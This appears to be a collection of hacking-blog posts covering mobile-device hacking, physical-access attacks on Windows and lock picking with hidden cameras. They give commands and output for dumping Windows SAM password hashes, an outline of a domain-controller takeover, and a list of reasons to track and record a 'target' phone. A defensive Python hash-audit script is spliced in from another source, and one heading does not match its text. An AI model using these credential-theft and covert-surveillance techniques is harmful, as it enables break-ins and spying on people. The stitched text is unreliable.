
Wednesday, January 22, 2020

Introduction to Mobile Hacking


Mobile hacking makes perfect sense because of the rise of smartphones and other mobile devices for online transactions and connecting with others. Since mobile devices are hubs of personal information that are easier to access compared to personal computers, they are among the devices most vulnerable to hackers.

Most common question: Why should you hack mobile devices?


  • Know the location of a target through an installed GPS service or cell ID tracking
  • Access emails and record phone conversations
  • Know the target’s internet browsing behavior
  • View all contents stored in the device, including photos
  • Send remote instructions to the mobile device
  • Use it to send spoofed messages or calls


Mobile app hacking is among the fastest ways to infiltrate a mobile device, since it is easy to upload a malicious app online and have people download it without even thinking about whether they should examine their download. Mobile apps are also considered “low-hanging fruit.” Most mobile apps can be directly accessed through their binary code, the code that mobile devices need in order to execute the app. That means that everyone who gets their hands on marketed hacking tools is able to exploit available mobile apps and turn them into hacking tools. Once hackers are able to compromise a mobile app, they will be able to perform the initial compromise within minutes.


How do hackers exploit binary code in mobile apps?
Here are some ways:

  • Modify the code to modify behavior

When hackers modify the binary code, they do that to disable the app’s security controls, requirements for purchasing, or prompts for ads to display. 


  • Inject malicious code

When hackers are able to get their hands on binary code, they can inject malicious code into it and then distribute it as an app update or a patch. Doing this can confuse a user into thinking that he is merely updating the app on his mobile device, but in reality, the hacker has engineered the user into installing an entirely different app.


  • Create a rogue app

Hackers can perform a drive-by attack, which is possible through API/function hooking or swizzling. When this is done, the hacker will be able to successfully compromise the targeted application and make redirecting the traffic or stealing user credentials possible.




  • Do reverse engineering

A hacker who has access to binary code can easily reverse-engineer it to expose further vulnerabilities, create similar counterfeit apps, or even resubmit it under new branding.













Tuesday, January 21, 2020

Physical Access Attacks Hacking


If an attacker is able to gain physical access to a machine, chances are that he'll hack it. In almost every OS or network device, there exists a “physical backdoor” which allows for manual resetting of a device configuration.
"Technologies used for perimeter security involve, for instance, intrusion detection sensors and alarm systems. In the context of cryptographic implementations, “physical attack” is understood as a term which encompasses all attacks based on physical means against cryptographic devices."

First: Resetting Microsoft Windows
As discussed before, Windows stores local user passwords in the SAM. The SAM is locked by Windows and cannot be accessed, copied or read while Windows is running. However, if we were to boot the same computer with a different OS (say Linux), then the SAM file would no longer be protected. Our newly booted Linux OS would see the SAM file as just another file on the Windows file system. We can then modify the SAM with specialized tools and reset passwords to our liking. Once the Windows machine boots back up, it will have new passwords in its SAM database.

Here we see that the Windows NTFS partition SDA1 is mounted with read-only (ro) permissions. Since we need to change the SAM file, we will require read/write permissions:


BT ~ # umount /mnt/sda1/ 
BT ~ # modprobe fuse 
BT ~ # ntfsmount /dev/sda1 /mnt/sda1/ 
BT ~ # mount 
tmpfs on / type tmpfs (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
usbfs on /proc/bus/usb type usbfs (rw)
/dev/sda1 on /mnt/sda1 type fuse (rw,nosuid,nodev,default_permissions,allow_other)
BT ~ #

Now we can dump the SAM file using bkhive and samdump2:

BT ~ # bkhive /mnt/sda1/WINNT/system32/config/system system.txt
Bkhive ncuomo@studenti.unina.it
Bootkey: dc155851060590ee807d3c660a437109 
BT ~ # samdump2 /mnt/sda1/WINNT/system32/config/sam system.txt >hashes.txt 
Samdump2 ncuomo@studenti.unina.it 
This product includes cryptographic software written by Eric Young (eay@cryptsoft.com)

No password for user Guest(501) 
BT ~ # cat hashes.txt
Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee::::
NetShowServices:1001:4e239a9b2c8fca59049021d2a350c02c:021c54b8e10a4c420839b49a7cd21a66:::
IUSR_WIN2KSP4:1003:76af34c719386a457aa40990e59dd60e:1c6560db5a2eb3f2da11bfd04d7c5a91:::
IWAM_WIN2KSP4:1004:1cad3d74dee85109bb0b6cba129ef50e:7212a9f44e59a1b73d88fa7d670266db:::
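
As an added example (not part of the original post or of samdump2), the Python below audits output in the colon-separated format shown above for accounts that still store an LM hash or have a blank password. The sample lines and the names `audit_line` and `audit` are constructed for illustration; the two empty-password constants are the standard well-known values.

```python
"""Audit pwdump-format lines (user:rid:lm:nt:::) for weak credential storage."""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password
EMPTY_LM_HALF = EMPTY_LM[:16]  # LM hashes each 7-character half separately

# Constructed sample input: the hex values are made up, not real hashes.
SAMPLE = """\
Administrator:500:0123456789abcdefaad3b435b51404ee:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee::::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
"""


def audit_line(line):
    """Return (user, rid, findings) for one line, or None if it is malformed."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    user, rid = parts[0], int(parts[1])
    lm, nt = parts[2].lower(), parts[3].lower()
    findings = []
    if lm in ("", EMPTY_LM) and nt in ("", EMPTY_NT):
        findings.append("blank-password")
    elif lm not in ("", EMPTY_LM):
        findings.append("lm-hash-stored")  # legacy LM storage is still enabled
        if lm[16:] == EMPTY_LM_HALF:
            findings.append("password-7-chars-or-fewer")
    if rid == 500:
        findings.append("builtin-administrator")  # RID 500 is the built-in admin
    return user, rid, findings


def audit(text):
    """Map each account name to its list of findings."""
    results = {}
    for line in text.splitlines():
        parsed = audit_line(line)
        if parsed is not None:
            user, _rid, findings = parsed
            results[user] = findings
    return results


if __name__ == "__main__":
    for user, findings in audit(SAMPLE).items():
        print(f"{user}: {', '.join(findings) or 'ok'}")
```

Accounts flagged `lm-hash-stored` are the reason to enable the Windows policy "Network security: Do not store LAN Manager hash value on next password change" and then rotate those passwords.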


We can modify the SAM using a useful tool such as chntpw.


Second: Resetting a password on a Domain Controller

Windows domain controllers do not store their user passwords in the local SAM, but in Active Directory. Active Directory cannot be manually edited offline, so a different approach is taken. A Windows domain controller can be booted without Active Directory (Active Directory Restore Mode). This is usually done for Active Directory maintenance or defragmentation. When Active Directory is not loaded, the domain controller will temporarily revert to local username authentication, and will once again use the SAM file present on the machine. A possible attack vector would be to reset/crack the Domain Controller's local administrator password (by SAM manipulation or dumping) and then load it up in “Active Directory Restore Mode” and log in with the modified/cracked password. Once logged in, a service is installed which executes the “net user” command (with SYSTEM privileges). Once the Domain Controller is rebooted and allowed to load Active Directory, the service adds/modifies the user and allows us to log in with our altered password.

Third: Resetting a Cisco Device

In Linux, a similar technique is used to reset root passwords. The machine is either booted in single-user mode or booted off a different operating system in order to manually change the /etc/shadow file.

Wednesday, January 8, 2020

The Tools of the Social Engineering

(Man is a tool-using animal. Without tools he is nothing, with tools he is all. )


The social engineer’s tools category has the potential to be huge, but this book isn’t trying to become a manual on how to pick locks or spoof a phone number. Instead it is an attempt to give you enough information to decide what tools would augment your practice. When it comes to social engineering, having a decent toolset can make or break the ability of the social engineer to be successful.
The first section we see, “Physical Tools,” focuses on things like lock picks, shims, and cameras. Here I provide some information on using phone spoofing in a social engineering attack, continue with a discussion of some of the best software-based information-gathering tools on the market, then end with a discussion about password profiling tools.

  • Physical Tools
Physical security is comprised of the measures that companies or people take to remain secure that do not involve a computer. It often involves locks, motion cameras, window sensors, and the like.
  • Lock Picks
[Figure: a very rough image of a simple lock]


A lock pick simulates the key in moving all the pins into the correct position one by one, allowing the lock to turn freely and open the door. You need two main tools to pick a lock: picks and a tension wrench. Picks are long pieces of metal that curve at the end, similar to a dentist’s tool. They reach inside the lock and move the pins up and down until they are in the right position.


To pick a lock, follow these steps:

  • Insert the tension wrench into the keyhole and turn it in the same direction you would turn the key. The real skill here is knowing how much tension to add: use too much or too little, and the pins won’t fall into place, thus allowing the lock to turn. Providing just the right amount of tension creates a small ledge that offsets the plug enough to catch the pin shafts.
  • Insert the pick and use it to lift the pins one by one until you feel them lock in place. You can hear a slight click when an upper pin falls into position. When you get all the pins into position the plug will rotate freely, and you will have picked the lock.
[Images: business card–sized lock-pick set; pocketknife]

Cameras and Recording Devices
Cameras and recording devices seem so “peeping Tom-ish” that many times the question arises, “Why? Why use hidden cameras and covert recording devices in an SE gig?” Good question. It has a simple two-part answer: for proof and protection.
  •  Let’s discuss the concept of proof. As already mentioned, a social engineering audit is where you are testing people. It is trying to help a company patch the human infrastructure to be more secure. 
  • The second reason to use recording devices in an SE gig is for protection, mainly for the professional social engineers.


All of these devices capture audio and color video from a hidden camera except for the pen, which is an audio recorder.

Note:
In part two we will read about some other tools, the use of a GPS tracker, and some online information-gathering tools.
